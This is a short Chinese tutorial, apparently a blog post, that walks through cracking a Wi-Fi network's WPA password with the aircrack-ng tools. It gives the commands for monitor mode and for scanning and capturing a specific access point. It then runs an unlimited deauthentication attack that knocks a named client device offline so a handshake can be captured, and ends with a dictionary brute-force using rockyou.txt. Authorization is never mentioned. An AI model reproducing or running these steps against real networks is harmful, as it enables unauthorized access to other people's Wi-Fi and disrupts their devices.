1.更改网卡为监听模式
sudo airmon-ng start wlan0


2.监听网卡
sudo airodump-ng wlan0mon

BSSID AP端的mac地址
PWR 信号强度(绝对值越小,信号越强)
Data 对应路由器的在线数据吞吐量,数值越大,数值上传量越大
CH 对应路由的频道
ESSID 对应路由器的名称
3.抓包
sudo airodump-ng --bssid 30:86:EB:E7:29:61 -c 11 -w /home/kali wlan0mon

4.给其中一台设备发送下线指令
sudo aireplay-ng -0 0 -a 30:86:EB:E7:29:61 -c FC:BE:7B:58:17:BD wlan0mon
sudo aireplay-ng -<攻击模式,这里使用持续攻击(0)> [攻击次数,0为无限攻击] -a <AP端的MAC地址> -c <被攻击设备的MAC地址> <interface名称>
等待第3步中出现 [WPA handshake],就可以退出了
5.关闭监听模式
sudo airmon-ng stop wlan0mon

6.开始暴力破解
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 30:86:EB:E7:29:61 /home/kali-01.cap

主要看人品,字典才是王道.
Wi-Fi网络嗅探与破解教程
本文介绍了如何将网卡设置为监听模式,使用airodump-ng进行网络监控,捕获WPA握手包, aireplay-ng发送下线指令进行断线攻击,以及使用aircrack-ng进行密码暴力破解。步骤详细,强调了字典在破解过程中的关键作用。
5804

被折叠的 条评论
为什么被折叠?



